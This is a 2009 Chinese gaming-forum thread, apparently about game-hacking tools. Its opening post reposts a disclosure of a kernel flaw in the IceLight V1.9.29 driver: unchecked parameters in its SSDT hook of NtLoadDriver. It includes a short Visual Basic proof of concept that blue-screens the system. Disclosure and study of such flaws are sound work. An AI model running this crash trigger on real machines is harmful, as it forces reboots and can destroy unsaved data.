关于IL+XT挂起的方法,附IL下载并说明蓝屏问题

社区服务
高级搜索
猴岛论坛综合游戏交流关于IL+XT挂起的方法,附IL下载并说明蓝屏问题
发帖 回复
正序阅读 最近浏览的帖子最近浏览的版块
8个回复

关于IL+XT挂起的方法,附IL下载并说明蓝屏问题

楼层直达
somao88

ZxID:7640031

等级: 少校
I wanted to believe someone ,

举报 只看楼主 使用道具 楼主   发表于: 2009-09-29 0
(注:转载于葡萄)
关于IL+XT挂起的方法:人妖发过了,自己找找。。我就不发了

IL下载,简单点直接迅雷搜搜找,或者论坛里有人也发了连接

以下问题看清楚了,说是木马病毒的我。。。。:


IceLight (以下简称 IL) 号称一款计算机安全辅助工具, 在 9 月 14 日及之后的版本中加入了主动防御功能。

令人遗憾的是, 其最新版本 V1.9.29 的驱动程序中存在多处内核拒绝服务漏洞, 在开启 IceLight 主动防御的情况下, 任意权限的用户即可导致系统蓝屏。

出问题的组件: ILDriverXSZ.sys CheckSum=00010C03 TimeStamp=48E0B5F0

IL 在对 SSDT Hook 时, 存在多处参数不经检查即使用, 用户态传入无效地址即可引发错误, 系统崩溃, 蓝屏重启.

示例函数: NtLoadDriver

函数 NtLoadDriver 的原型是:

NTSTATUS
NtLoadDriver(
    IN PUNICODE_STRING DriverServiceName
    )

IL 在其 Hook 函数中, 没有任何检查地使用了 DriverServiceName, 这样, 如果我们传入一个无效的地址, 就会引发崩溃, 蓝屏重启.

测试代码:

Declare Function ZwLoadDriver Lib "ntdll" (ByVal a As Long) As Long



Sub Main()
    MsgBox "IceLight V1.9.29 内核漏洞演示 by iceboy"
    ZwLoadDriver 0
End Sub

如何解决:  XP多用户---切换到GUEST用户使用可解决
jiangzequan

ZxID:2184184

等级: 列兵
举报 只看该作者 8楼  发表于: 2009-10-14 0
IL呢?
︷沉默是金┊o

ZxID:7119085

等级: 上尉
在此之间,只有我和B(B是一个谜,真相确有三个)!

举报 只看该作者 7楼  发表于: 2009-10-14 0
下载地址呢??/



别说、对不起。
闷骚猴子

ZxID:8986765

等级: 新兵
举报 只看该作者 6楼  发表于: 2009-09-29 0
切换到来宾加载不了IL
20525283

ZxID:3254078

等级: 上尉
倪TX不给觉醒; 我依然ぇ素。
举报 只看该作者 5楼  发表于: 2009-09-29 0
深奥噢
homeland1987

ZxID:8982450

等级: 新兵
举报 只看该作者 4楼  发表于: 2009-09-29 0
切换到GUEST用户直接加载不了IL了,真水啊...
lxl7705136

ZxID:8784190

等级: 新兵
举报 只看该作者 地板   发表于: 2009-09-29 0
     
feather_xixi

ZxID:1273295

等级: 准尉
举报 只看该作者 板凳   发表于: 2009-09-29 0
什么情况..
欲望.Dream

ZxID:8749153

等级: 元帅

举报 只看该作者 沙发   发表于: 2009-09-29 0
沙发。我来试试
« 返回列表
发帖 回复